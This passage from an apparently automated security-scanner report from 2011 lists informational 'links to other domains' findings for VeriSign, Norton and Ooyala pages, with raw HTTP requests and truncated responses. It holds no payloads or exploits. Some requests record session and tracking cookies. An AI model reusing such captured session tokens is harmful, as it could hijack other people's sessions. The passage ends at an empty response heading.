src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"> </a>...[SNIP]... 
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href="https://products.verisign.com/geocenter/reseller/logon.do"> VeriSign Partner Center Sign In</a>...[SNIP]... <br style="clear: left" /> <a style="background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); text-align: center; line-height: 24px; margin: 5px 10px 0pt 0pt; width: 75px; display: block; float: left; height: 24px; color: rgb(255,255,255); font-weight: bold; text-decoration: none" href="https://trust-center.verisign.ch/process/retail/trust_console_login?application_locale=VTC_US"> Sign In</a>...[SNIP]... <li> <a href="https://www.verisign.com/vtcsslvideo/index.html" target="_blank"> Trust Center Enrollment Demo (video) </a>...[SNIP]... <li><a href="//blogs.verisign.com/?tid=footer"> Blogs</a>...[SNIP]... <li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer"> Worldwide Sites</a>...[SNIP]... <li> <a href="//www.verisign.com/rss/index.html?tid=footer"> RSS</a>...[SNIP]... </a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html"> two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html"> identity protection</a>...[SNIP]... </a> and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html"> PKI</a>...[SNIP]...
14.13. https://knowledge.verisign.com/support/code-signing-support/index
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/code-signing-support/index
Issue detail
The page was loaded from a URL containing a query string:
https://knowledge.verisign.com/support/code-signing-support/index?page=content&id=AR185
The response contains the following links to other domains:
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/
Request
GET /support/code-signing-support/index?page=content&id=AR185 HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:36 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.14. https://knowledge.verisign.com/support/code-signing-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/code-signing-support/index.html
Issue detail
The page was loaded from a URL containing a query string:
https://knowledge.verisign.com/support/code-signing-support/index.html?tid=gnpsupport
The response contains the following links to other domains:
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/
Request
GET /support/code-signing-support/index.html?tid=gnpsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:38 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.15. https://knowledge.verisign.com/support/digital-id-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/digital-id-support/index.html
Issue detail
The page was loaded from a URL containing a query string:
https://knowledge.verisign.com/support/digital-id-support/index.html?tid=gnsupport
The response contains the following links to other domains:
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/
Request
GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:40 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.16. https://knowledge.verisign.com/support/eca-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/eca-support/index.html
Issue detail
The page was loaded from a URL containing a query string:
https://knowledge.verisign.com/support/eca-support/index.html?tid=gnsupport
The response contains the following links to other domains:
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/
Request
GET /support/eca-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:41 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.17. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/mpki-for-ssl-support/index
Issue detail
The page was loaded from a URL containing a query string:
https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=home
The response contains the following links to other domains:
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/
Request
GET /support/mpki-for-ssl-support/index?page=home HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:51 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 42730 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.18. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/mpki-for-ssl-support/index.html
Issue detail
The page was loaded from a URL containing a query string:
https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html?tid=gnsupport
The response contains the following links to other domains:
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/
Request
GET /support/mpki-for-ssl-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:45:45 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.19. https://knowledge.verisign.com/support/mpki-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/mpki-support/index.html
Issue detail
The page was loaded from a URL containing a query string: https://knowledge.verisign.com/support/mpki-support/index.html?tid=gnsupport
The response contains the following links to other domains: https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://www.verisign.be/ https://www.verisign.ch/ https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/mpki-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:43 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.20. https://knowledge.verisign.com/support/ssl-certificates-support/index
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/ssl-certificates-support/index
Issue detail
The page was loaded from a URL containing a query string: https://knowledge.verisign.com/support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false
The response contains the following links to other domains: https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://www.verisign.be/ https://www.verisign.ch/ https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:12 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 46210 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.21. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/ssl-certificates-support/index.html
Issue detail
The page was loaded from a URL containing a query string: https://knowledge.verisign.com/support/ssl-certificates-support/index.html?tid=gnpsupport
The response contains the following links to other domains: https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://www.verisign.be/ https://www.verisign.ch/ https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/ssl-certificates-support/index.html?tid=gnpsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:03 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.22. https://knowledge.verisign.com/support/trust-seal-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/trust-seal-support/index.html
Issue detail
The page was loaded from a URL containing a query string: https://knowledge.verisign.com/support/trust-seal-support/index.html?tid=gnpsupport
The response contains the following links to other domains: https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://www.verisign.be/ https://www.verisign.ch/ https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/trust-seal-support/index.html?tid=gnpsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:18 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.23. https://onlinefamily.norton.com/familysafety/loginStart.fs
Summary
Severity: Information
Confidence: Certain
Host: https://onlinefamily.norton.com
Path: /familysafety/loginStart.fs
Issue detail
The page was loaded from a URL containing a query string: https://onlinefamily.norton.com/familysafety/loginStart.fs?inid=us_2010June_NOF
The response contains the following links to other domains: https://www.facebook.com/norton?locale=en_US https://www.facebook.com/plugins/like.php?href=https%3A//www.facebook.com/norton&layout=button_count&show_faces=false&send=false&action=like&font&colorscheme=light&ref=NortonOnlineFamily&locale=en_US
Request
GET /familysafety/loginStart.fs?inid=us_2010June_NOF HTTP/1.1 Host: onlinefamily.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:45:55 GMT Server: Apache Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:55 GMT; Path=/ Set-Cookie: formVersion=1315604755623; Path=/ Set-Cookie: JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety Cache-Control: no-cache,no-store,must-revalidate,max-stale=0 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Connection: close Vary: Accept-Encoding Content-Length: 37906 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <...[SNIP]... <div id="norton-on-facebook" style="font-size:11px;"> <a href="https://www.facebook.com/norton?locale=en_US" style="color:#3B5998; font-size:11px; float:left;" target="_blank"> <strong>...[SNIP]... </div> <iframe src="https://www.facebook.com/plugins/like.php?href=https%3A//www.facebook.com/norton&layout=button_count&show_faces=false&send=false&action=like&font&colorscheme=light&ref=NortonOnlineFamily&locale=en_US" scrolling="no" frameborder="0" style="border:none; overflow:hidden; padding-top:5px; height:22px; width:150px;" allowTransparency="true"> </iframe>...[SNIP]...
14.24. http://player.ooyala.com/player.js
Summary
Severity: Information
Confidence: Certain
Host: http://player.ooyala.com
Path: /player.js
Issue detail
The page was loaded from a URL containing a query string: http://player.ooyala.com/player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent
The response contains the following link to another domain: http://www.adobe.com/go/getflash/
Request
GET /player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK Last-Modified: Fri, 09 Sep 2011 21:25:08 GMT Content-Type: text/javascript; charset=utf-8 X-Ooyala-Server-Id: i-afd1a3c3 X-Pad: avoid browser bug Content-Length: 26306 Cache-Control: private, max-age=300 Date: Fri, 09 Sep 2011 21:26:10 GMT Connection: close Vary: Accept-Encoding (function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f...[SNIP]... <td align="center"><a href="http://www.adobe.com/go/getflash/" style="color:white"> <span style="font-size:12px">...[SNIP]...
14.25. http://query.verisign.com/search
Summary
Severity: Information
Confidence: Certain
Host: http://query.verisign.com
Path: /search
Issue detail
The page was loaded from a URL containing a query string: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
The response contains the following links to other domains: http://verisign.ch/assets/shared/images/sm_004276_oo.gif http://www.symantec.com/ http://www.verisign.be/ http://www.verisign.ch/ http://www.verisign.ch/code-signing/index.html http://www.verisign.ch/contact-information/index.html?tid=footer http://www.verisign.ch/corporate/index.html?tid=footer http://www.verisign.ch/legal-notices/index.html?tid=footer http://www.verisign.ch/privacy/index.html?tid=footer http://www.verisign.ch/repository/index.html?tid=footer http://www.verisign.ch/site-map/index.html?tid=footer http://www.verisign.ch/ssl/index.html http://www.verisign.ch/ssl/ssl-information-center/ev-ssl-certificate/index.html http://www.verisign.ch/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html http://www.verisign.ch/ssl/ssl-information-center/index.html http://www.verisign.ch/trust-seal/index.html http://www.verisign.ch/trust-seal/resources/malware-faq/index.html http://www.verisign.de/ http://www.verisign.dk/ http://www.verisign.es/ http://www.verisign.fr/ http://www.verisign.in/ http://www.verisign.it/ http://www.verisign.se/ http://www.verisignchina.com.cn/ https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
Request
GET /search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
